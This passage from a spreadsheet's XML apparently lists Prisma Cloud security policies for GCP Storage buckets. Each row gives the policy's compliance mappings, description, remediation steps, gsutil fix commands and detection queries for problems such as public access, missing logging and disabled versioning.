800-53 Rev4, ACSC Information Security Manual (ISM), TX-RAMP Level 2, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, NIST 800-53 Rev 5, HIPAA, HIPAA, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Fedramp (Moderate), Copy of New Zealand Information Security Manual (NZISM v3.4), PCI DSS v3.2.1, NIST SP 800-171 Revision 2</t>
        </is>
      </c>
      <c r="B2989" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2989" s="2" t="inlineStr"/>
      <c r="D2989" t="inlineStr"/>
      <c r="E2989" t="inlineStr"/>
      <c r="F2989" t="inlineStr"/>
      <c r="G2989" t="b">
        <v>1</v>
      </c>
      <c r="H29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89" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2989" t="inlineStr">
        <is>
          <t>gcloud-storage</t>
        </is>
      </c>
      <c r="K2989" t="inlineStr">
        <is>
          <t>GCP Storage buckets are publicly accessible to all users</t>
        </is>
      </c>
      <c r="L2989" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M2989" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2989" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2989" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2989" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2989" t="inlineStr">
        <is>
          <t>10</t>
        </is>
      </c>
      <c r="R2989" t="inlineStr">
        <is>
          <t>10.8</t>
        </is>
      </c>
      <c r="S2989" t="inlineStr">
        <is>
          <t>Attack Path Rule,Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2989" t="b">
        <v>1</v>
      </c>
      <c r="U2989" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2989" t="inlineStr">
        <is>
          <t>gcloud-storage-buckets-list</t>
        </is>
      </c>
      <c r="W2989" t="inlineStr">
        <is>
          <t>This policy identifies the buckets which are publicly accessible to all users. Enabling public access to Storage buckets enables anybody with a web association to access sensitive information that is critical to business. Access over a whole bucket is controlled by IAM. Access to individual objects within the bucket is controlled by its ACLs.</t>
        </is>
      </c>
      <c r="X2989" t="inlineStr">
        <is>
          <t>To remove public access from a bucket, either enable "Public access prevention" or edit/remove any permissions granted to 'allUsers'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Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-google-cloud-114
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-google-cloud-114</t>
        </is>
      </c>
      <c r="Y2989" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'storage.buckets.getIamPolicy' and 'storage.buckets.setIamPolicy' permissions. Successful execution will revoke 'allUsers' permission access in GCP Storage buckets.",
'impact': 'Revokes allusers permission access in GCP Storage buckets',
'cliScriptTemplate': 'gsutil iam ch -d allUsers gs://$resourceName'</t>
        </is>
      </c>
      <c r="Z2989" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-storage-buckets-list' AND json.rule = iamConfiguration.publicAccessPrevention does not equal ignore case "enforced" and iam.bindings[*] size greater than 0 and iam.bindings[*].members[*] any equal allUsers
{"category":"General","resourceTypes":["google_storage_bucket"]}</t>
        </is>
      </c>
      <c r="AA2989" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2989" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2989" t="inlineStr">
        <is>
          <t>PC-GCP-STO-193-CKV_GCP_114</t>
        </is>
      </c>
      <c r="AD2989" t="b">
        <v>1</v>
      </c>
      <c r="AE2989" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2989" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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89" t="inlineStr">
        <is>
          <t>1530d5de-34de-4de9-bb0a-82444607fe66</t>
        </is>
      </c>
      <c r="AI2989" t="inlineStr">
        <is>
          <t>41f7a4b1-cad6-4fbf-b698-1fd11a8869a8</t>
        </is>
      </c>
      <c r="AJ2989" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2989" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2990">
      <c r="A2990" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, RBI Baseline Cyber Security and Resilience Requirements, CRI Profile v2.0, Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), ISO 27001:2013, APRA (CPS 234) Information Security, CSA CCM v3.0.1, NIST 800-53 Rev 5, PCI DSS v4.0, NIST CSF v2.0, jbrox - GDPR, NIST CSF, ISO/IEC 27017:2015, Telecommunications Security Act - TSA, ISO 27002:2022, Risk Management in Technology (RMiT), Australian Energy Sector Cyber Security Framework (AESCSF), MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, ISO/IEC 27002:2013, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, ITSG-33, NIST CSF, Secure Controls Framework (SCF) - 2024.2, PCI DSS v4.0, CIS v1.0.0 (GCP), PCI DSS v4.0, GDPR, MITRE ATT&amp;CK v12, CSA CCM v.4.0.1, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, MITRE ATT&amp;CK v8.2 [Deprecated], NYDFS 23 CRR-NY 500.0, ISO/IEC 27017:2015, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CIS Controls v8, CSA CCM v.4.0.1, GDPR, ISO/IEC 27017:2015, CDC NIST 800-53 Rev4, kfirdaus AWS Account-CS, Microsoft Cloud Security Benchmark v1, CDC NIST 800-53 Rev4, CIS Controls v7.1, ISO/IEC 27001:2022, ISO/IEC 27001:2022, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, APRA (CPS 234) Information Security, CSA CCM v4.0.12, ISO 27001:2013, ISO 27001:2013, SOC 2, PCI DSS v4.0, ISO 27002:2022, CSA CCM v.4.0.6, TX-RAMP Level 1, NIST SP 800-171 Revision 2, Secure Controls Framework (SCF) - 2022.2.1, SOC 2, NIST SP 800-172, Copy of CIS Controls v8, PCI DSS v4.0, TX-RAMP Level 2, NIST SP 800-171 Revision 3, CSA CCM v4.0.12, NIST CSF, NIST CSF v2.0, Copy of ACSC Information Security Manual (ISM)-clone, NIST CSF, CSA CCM v4.0.12, MITRE ATT&amp;CK v6.3 [Deprecated], RBI Baseline Cyber Security and Resilience Requirements, Microsoft Cloud Security Benchmark v1, NIST CSF, HITRUST CSF v.11.2.0, Copy of CIS Controls v8, NIST 800-53 Rev 5, Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, PCI DSS v4.0, PCI DSS v4.0, CIS Controls v8, NIST CSF, jbrox - GDPR, jbrox - GDPR, FFIEC, CSA CCM v.4.0.1, SOC 2, CIS Controls v8.1, CRI Profile v2.0, PCI DSS v4.0, Risk Management in Technology (RMiT), Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, NIST 800-53 Rev4, CRI Profile v1.2.1, ISO 27001:2013, ISO 27002:2022, kashan ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, CIS Controls v7.1, ISO/IEC 27002:2013, SOC 2, PCI DSS v4.0, SOC 2, NIST CSF v2.0, APRA (CPS 234) Information Security, HIPAA, NIST 800-53 Rev4, kfirdaus AWS Account-CS, PIPEDA, NIST CSF, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, GDPR, kashan ACSC Information Security Manual (ISM), PCI DSS v4.0, PCI DSS v4.0, SOC 2, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, Fedramp (Moderate), CRI Profile v1.2.1, CSA CCM v.4.0.6, ISO 27001:2013, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, NYDFS 23 CRR-NY 500.0, CDC NIST 800-53 Rev4, FFIEC, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, CCPA 2018, MITRE ATT&amp;CK v10.0 [Deprecated], MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CSA CCM v.4.0.6, CIS Controls v8.1, CSA CCM v4.0.12, CSA CCM v.4.0.6, NIST CSF, Matt's ATT&amp;ACK, ISO/IEC 27001:2022, DORA, Copy of ACSC Information Security Manual (ISM)-clone, PCI DSS v3.2.1, PCI DSS v4.0, NIST 800-53 Rev4, Cybersecurity Maturity Model Certification (CMMC) v.1.02</t>
        </is>
      </c>
      <c r="B2990" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2990" s="2" t="inlineStr"/>
      <c r="D2990" t="inlineStr"/>
      <c r="E2990" t="inlineStr"/>
      <c r="F2990" t="inlineStr"/>
      <c r="G2990" t="b">
        <v>1</v>
      </c>
      <c r="H29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0" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2990" t="inlineStr">
        <is>
          <t>gcloud-storage</t>
        </is>
      </c>
      <c r="K2990" t="inlineStr">
        <is>
          <t>GCP Storage Bucket does not have Access and Storage Logging enabled</t>
        </is>
      </c>
      <c r="L2990" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2990" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2990" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2990" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2990" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2990" t="inlineStr">
        <is>
          <t>Guidelines for System Monitoring</t>
        </is>
      </c>
      <c r="R2990" t="inlineStr">
        <is>
          <t>ISM-1228</t>
        </is>
      </c>
      <c r="S2990" t="inlineStr">
        <is>
          <t>Attack Path Rule,GCP</t>
        </is>
      </c>
      <c r="T2990" t="b">
        <v>0</v>
      </c>
      <c r="U2990" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2990" t="inlineStr">
        <is>
          <t>gcloud-storage-buckets-list</t>
        </is>
      </c>
      <c r="W2990" t="inlineStr">
        <is>
          <t>This policy identifies storage buckets that do not have Access and Storage Logging enabled. By enabling access and storage logs on target Storage buckets, it is possible to capture all events which may affect objects within target buckets. It is recommended that storage Access Logs and Storage logs are enabled for every Storage Bucket.</t>
        </is>
      </c>
      <c r="X2990" t="inlineStr">
        <is>
          <t>Follow the steps mentioned in the below link to enable Access and Storage logs using GSUTIL or JSON API.
Reference : https://cloud.google.com/storage/docs/access-logs 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-storage-gcs-policies/bc-gcp-logging-2
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-storage-gcs-policies/bc-gcp-logging-2</t>
        </is>
      </c>
      <c r="Y2990" t="inlineStr"/>
      <c r="Z2990" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name= 'gcloud-storage-buckets-list' AND json.rule = logging does not exist
{"category":"Storage","resourceTypes":["google_storage_bucket"]}</t>
        </is>
      </c>
      <c r="AA2990" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2990" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2990" t="inlineStr">
        <is>
          <t>PC-GCP-STO-90-CKV_GCP_62</t>
        </is>
      </c>
      <c r="AD2990" t="b">
        <v>1</v>
      </c>
      <c r="AE2990" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2990" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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0" t="inlineStr">
        <is>
          <t>aee21917-3cff-4004-b965-79fb52cff952</t>
        </is>
      </c>
      <c r="AI2990" t="inlineStr">
        <is>
          <t>5c1b3dec-df2d-4254-8c7d-37425f2c617a</t>
        </is>
      </c>
      <c r="AJ2990" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2990" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2991">
      <c r="A2991" t="inlineStr">
        <is>
          <t>RBI Baseline Cyber Security and Resilience Requirements, CRI Profile v2.0, Sarbanes Oxley Act (SOX), PCI DSS v4.0, NIST CSF v2.0, Telecommunications Security Act - TSA, ISO 27002:2022, Australian Energy Sector Cyber Security Framework (AESCSF), Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, ITSG-33, Secure Controls Framework (SCF) - 2024.2, PCI DSS v4.0, PCI DSS v4.0, ACSC Information Security Manual (ISM), NYDFS 23 CRR-NY 500.0, CIS Controls v8, HITRUST CSF v.11.2.0, GDPR, kfirdaus AWS Account-CS, CIS Controls v7.1, ISO/IEC 27001:2022, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v4.0.12, PCI DSS v4.0, ISO 27002:2022, CSA CCM v.4.0.6, TX-RAMP Level 1, Secure Controls Framework (SCF) - 2022.2.1, Copy of CIS Controls v8, PCI DSS v4.0, TX-RAMP Level 2, CSA CCM v4.0.12, NIST CSF v2.0, Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v4.0.12, RBI Baseline Cyber Security and Resilience Requirements, Microsoft Cloud Security Benchmark v1, Copy of CIS Controls v8, PCI DSS v4.0, PCI DSS v4.0, CIS Controls v8, FFIEC, CIS Controls v8.1, CRI Profile v2.0, PCI DSS v4.0, Insurance Regulatory And Development Authority Of India, CRI Profile v1.2.1, ISO 27002:2022, kashan ACSC Information Security Manual (ISM), CIS Controls v7.1, PCI DSS v4.0, SOC 2, HIPAA, kfirdaus AWS Account-CS, kashan ACSC Information Security Manual (ISM), PCI DSS v4.0, PCI DSS v4.0, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, CRI Profile v1.2.1, CSA CCM v.4.0.6, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), NYDFS 23 CRR-NY 500.0, FFIEC, CSA CCM v.4.0.6, CIS Controls v8.1, CSA CCM v4.0.12, CSA CCM v.4.0.6, ISO/IEC 27001:2022, DORA, Copy of ACSC Information Security Manual (ISM)-clone, PCI DSS v4.0</t>
        </is>
      </c>
      <c r="B2991" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2991" s="2" t="inlineStr"/>
      <c r="D2991" t="inlineStr"/>
      <c r="E2991" t="inlineStr"/>
      <c r="F2991" t="inlineStr"/>
      <c r="G2991" t="b">
        <v>1</v>
      </c>
      <c r="H29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1" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2991" t="inlineStr">
        <is>
          <t>gcloud-storage</t>
        </is>
      </c>
      <c r="K2991" t="inlineStr">
        <is>
          <t>GCP storage bucket is logging to itself</t>
        </is>
      </c>
      <c r="L2991" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2991" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2991" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2991" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2991" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2991" t="inlineStr">
        <is>
          <t>Guidelines for System Monitoring</t>
        </is>
      </c>
      <c r="R2991" t="inlineStr">
        <is>
          <t>ISM-1228</t>
        </is>
      </c>
      <c r="S2991" t="inlineStr"/>
      <c r="T2991" t="b">
        <v>0</v>
      </c>
      <c r="U2991" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2991" t="inlineStr">
        <is>
          <t>gcloud-storage-buckets-list</t>
        </is>
      </c>
      <c r="W2991" t="inlineStr">
        <is>
          <t>This policy identifies GCP storage buckets that are sending logs to themselves. When storage buckets use the same bucket to send their access logs, a loop of logs will be created, which is not a security best practice. It is recommended to spin up new and different log buckets for storage bucket logging.</t>
        </is>
      </c>
      <c r="X2991" t="inlineStr">
        <is>
          <t>To resolve the alert, a new bucket should be created or an existing bucket other than the alerting bucket itself should be set for logging by following steps in the below-mentioned link.
https://cloud.google.com/storage/docs/access-logs#delivery 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-storage-gcs-policies/bc-gcp-logging-3
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-storage-gcs-policies/bc-gcp-logging-3</t>
        </is>
      </c>
      <c r="Y2991" t="inlineStr"/>
      <c r="Z2991" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name= 'gcloud-storage-buckets-list' AND json.rule = logging.logBucket equals $.name
{"category":"Storage","resourceTypes":["google_storage_bucket"]}</t>
        </is>
      </c>
      <c r="AA2991" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2991" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2991" t="inlineStr">
        <is>
          <t>PC-GCP-STO-774-CKV_GCP_63</t>
        </is>
      </c>
      <c r="AD2991" t="b">
        <v>1</v>
      </c>
      <c r="AE2991" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2991" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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1" t="inlineStr">
        <is>
          <t>53dd2bfd-1b3c-4b7a-9eea-bad3c148cd15</t>
        </is>
      </c>
      <c r="AI2991" t="inlineStr">
        <is>
          <t>f86eb55e-e113-4248-9471-774d5f0e7f0b</t>
        </is>
      </c>
      <c r="AJ2991" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2991" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2992">
      <c r="A2992" t="inlineStr">
        <is>
          <t>ISO/IEC 27017:2015, APRA (CPS 234) Information Security, HIPAA, NIST SP 800-172, Cybersecurity Maturity Model Certification (CMMC) v.1.02, ISO/IEC 27017:2015, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, MITRE ATT&amp;CK v8.2 [Deprecated], ISO/IEC 27001:2022, PCI DSS v3.2.1, CIS v3.0.0 (GCP) Level 2, CSA CCM v4.0.12, HITRUST CSF v.11.2.0, ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27017:2015, Copy of CIS Controls v8, Secure Controls Framework (SCF) - 2022.2.1, Secure Controls Framework (SCF) - 2024.2, CIS Controls v8, HITRUST v.9.4.2 [Deprecated], Telecommunications Security Act - TSA, NIST CSF, SOC 2, TX-RAMP Level 1, ISO/IEC 27017:2015, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, CIS v1.2.0 (GCP), HITRUST v.9.4.2 [Deprecated], CSA CCM v.4.0.1, Insurance Regulatory And Development Authority Of India, ISO/IEC 27002:2013, Microsoft Cloud Security Benchmark v1, ISO/IEC 27002:2013, ISO/IEC 27017:2015, CSA CCM v.4.0.1, ISO/IEC 27002:2013, SOC 2, CSA CCM v.4.0.1, Rehan, SOC 2, ISO/IEC 27002:2013, CIS v1.1.0 (GCP), Secure Controls Framework (SCF) - 2024.2, APRA (CPS 234) Information Security, ITSG-33, CIS v2.0.0 (GCP) Level 2, CIS Controls v8.1, ISO/IEC 27002:2013, Brazilian Data Protection Law (LGPD), TX-RAMP Level 2, PCI DSS v3.2.1, Sarbanes Oxley Act (SOX), ISO/IEC 27001:2022, NIST SP 800-171 Revision 2, CIS Controls v7.1, NIST SP 800-172, CSA CCM v.4.0.1, HIPAA, HIPAA, CIS v1.3.0 (GCP), CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B2992" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2992" s="2" t="inlineStr"/>
      <c r="D2992" t="inlineStr"/>
      <c r="E2992" t="inlineStr"/>
      <c r="F2992" t="inlineStr"/>
      <c r="G2992" t="b">
        <v>1</v>
      </c>
      <c r="H29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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2992" t="inlineStr">
        <is>
          <t>gcloud-storage</t>
        </is>
      </c>
      <c r="K2992" t="inlineStr">
        <is>
          <t>GCP cloud storage bucket with uniform bucket-level access disabled</t>
        </is>
      </c>
      <c r="L2992" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2992" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2992" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2992" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2992" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2992" t="inlineStr">
        <is>
          <t>Storage</t>
        </is>
      </c>
      <c r="R2992" t="inlineStr">
        <is>
          <t>5.2</t>
        </is>
      </c>
      <c r="S2992" t="inlineStr"/>
      <c r="T2992" t="b">
        <v>1</v>
      </c>
      <c r="U2992" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2992" t="inlineStr">
        <is>
          <t>gcloud-storage-buckets-list</t>
        </is>
      </c>
      <c r="W2992" t="inlineStr">
        <is>
          <t>This policy identifies GCP storage buckets for which the uniform bucket-level access is disabled. Enabling uniform bucket-level access guarantees that if a Storage bucket is not publicly accessible, no object in the bucket is publicly accessible either. It is recommended that uniform bucket-level access is enabled on Cloud Storage buckets.</t>
        </is>
      </c>
      <c r="X2992" t="inlineStr">
        <is>
          <t>1. log in to GCP Console
2. Navigate to 'Storage'
3. Click on 'Browser' to get the list of storage buckets
4. Search for the alerted bucket and click on the bucket name
5. From the top menu go to 'PERMISSION' tab
6. Under the section 'Access control' click on 'SWITCH TO UNIFORM'
7. On the pop-up window select 'uniform'
8. Click on 'Save' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-storage-gcs-policies/bc-gcp-gcs-2
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-storage-gcs-policies/bc-gcp-gcs-2</t>
        </is>
      </c>
      <c r="Y2992" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'storage.buckets.update' permission. Successful execution will set uniform bucket level access in GCP Storage buckets. Important: Once uniform bucket-level access has been enabled on a bucket for 90 consecutive days,
it can no longer be disabled.",
'impact': 'Set uniform bucket level access in GCP Storage buckets',
'cliScriptTemplate': 'gsutil ubla set on gs://$resourceName'</t>
        </is>
      </c>
      <c r="Z2992" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-storage-buckets-list' AND json.rule = iamConfiguration.uniformBucketLevelAccess.enabled contains false
{"category":"Storage","resourceTypes":["google_storage_bucket"]}</t>
        </is>
      </c>
      <c r="AA2992" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2992" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2992" t="inlineStr">
        <is>
          <t>PC-GCP-STO-557-CKV_GCP_29</t>
        </is>
      </c>
      <c r="AD2992" t="b">
        <v>1</v>
      </c>
      <c r="AE2992" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2992" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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2" t="inlineStr">
        <is>
          <t>f0e09192-0716-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="AI2992" t="inlineStr">
        <is>
          <t>761e3fae-4a27-41bb-a9ea-ab063b35d574</t>
        </is>
      </c>
      <c r="AJ2992" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2992" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2993">
      <c r="A2993" t="inlineStr">
        <is>
          <t>ISO 27001:2013, ISO/IEC 27017:2015, APRA (CPS 234) Information Security, NIST SP 800-172, ISO/IEC 27017:2015, ITSG-33, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, MITRE ATT&amp;CK v8.2 [Deprecated], GDPR, ISO/IEC 27001:2022, CSA CCM v4.0.12, ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, ISO 27001:2013, ISO/IEC 27017:2015, Copy of CIS Controls v8, Secure Controls Framework (SCF) - 2024.2, CIS Controls v8, CIS v1.0.0 (GCP), TX-RAMP Level 1, NIST CSF, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, TX-RAMP Level 2, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, ISO/IEC 27002:2013, MITRE ATT&amp;CK v6.3 [Deprecated], Microsoft Cloud Security Benchmark v1, PCI DSS v3.2.1, ISO/IEC 27002:2013, ISO/IEC 27017:2015, CSA CCM v.4.0.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, Insurance Regulatory And Development Authority Of India, ISO 27001:2013, APRA (CPS 234) Information Security, SOC 2, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), HITRUST v.9.4.2 [Deprecated], CIS Controls v8.1, ISO/IEC 27002:2013, Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2022.2.1, DORA, Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, CIS Controls v7.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, CSA CCM v.4.0.1, ISO 27001:2013, CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B2993" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2993" s="2" t="inlineStr"/>
      <c r="D2993" t="inlineStr"/>
      <c r="E2993" t="inlineStr"/>
      <c r="F2993" t="inlineStr"/>
      <c r="G2993" t="b">
        <v>0</v>
      </c>
      <c r="H29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Pramm-XSIAM, Random v2, Ranti-Jira-Alert-rule, Ranti-rule-xsoar, RantiAlertRule-3, RaviAlert rule, Rehan-Zoom-CIEM-AlertRule, Stella test, TEST, TEST/XN, Test23, alert-rule-tushir, anomalies-avega, ar-vstoyko, attack path, aws-ec2-public-ip, azure-sentinel-test-pk, benedict-alert-rule-BP, bgoldstein-webhook-test-rule, cj_test_tagBased, cku-Alert-Rule-01, cku-Alert-Rule-02, dluzardo - alert rule, enwankwo-azure-acount-group-alert-rule,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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2993" t="inlineStr">
        <is>
          <t>gcloud-storage</t>
        </is>
      </c>
      <c r="K2993" t="inlineStr">
        <is>
          <t>GCP Storage log buckets have object versioning disabled</t>
        </is>
      </c>
      <c r="L2993" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2993" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2993" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2993" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2993" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2993" t="inlineStr">
        <is>
          <t>CIS Control 4</t>
        </is>
      </c>
      <c r="R2993" t="inlineStr">
        <is>
          <t>4.6</t>
        </is>
      </c>
      <c r="S2993" t="inlineStr"/>
      <c r="T2993" t="b">
        <v>1</v>
      </c>
      <c r="U2993" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2993" t="inlineStr">
        <is>
          <t>gcloud-storage-buckets-list</t>
        </is>
      </c>
      <c r="W2993" t="inlineStr">
        <is>
          <t>This policy identifies Storage log buckets which have object versioning disabled. Enabling object versioning on storage log buckets will protect your cloud storage data from being overwritten or accidentally deleted. It is recommended to enable object versioning feature on all storage buckets where sinks are configured.</t>
        </is>
      </c>
      <c r="X2993" t="inlineStr">
        <is>
          <t>Follow the below mentioned URL to enable object versioning on a bucket:
https://cloud.google.com/storage/docs/using-object-versioning#set</t>
        </is>
      </c>
      <c r="Y2993" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'storage.buckets.update' permission. Successful execution will enable GCP Storage log buckets 'versioning'.",
'impact': 'Enables versioning in GCP Storage log buckets',
'cliScriptTemplate': 'gsutil versioning set on gs://$resourceName'</t>
        </is>
      </c>
      <c r="Z2993" t="inlineStr">
        <is>
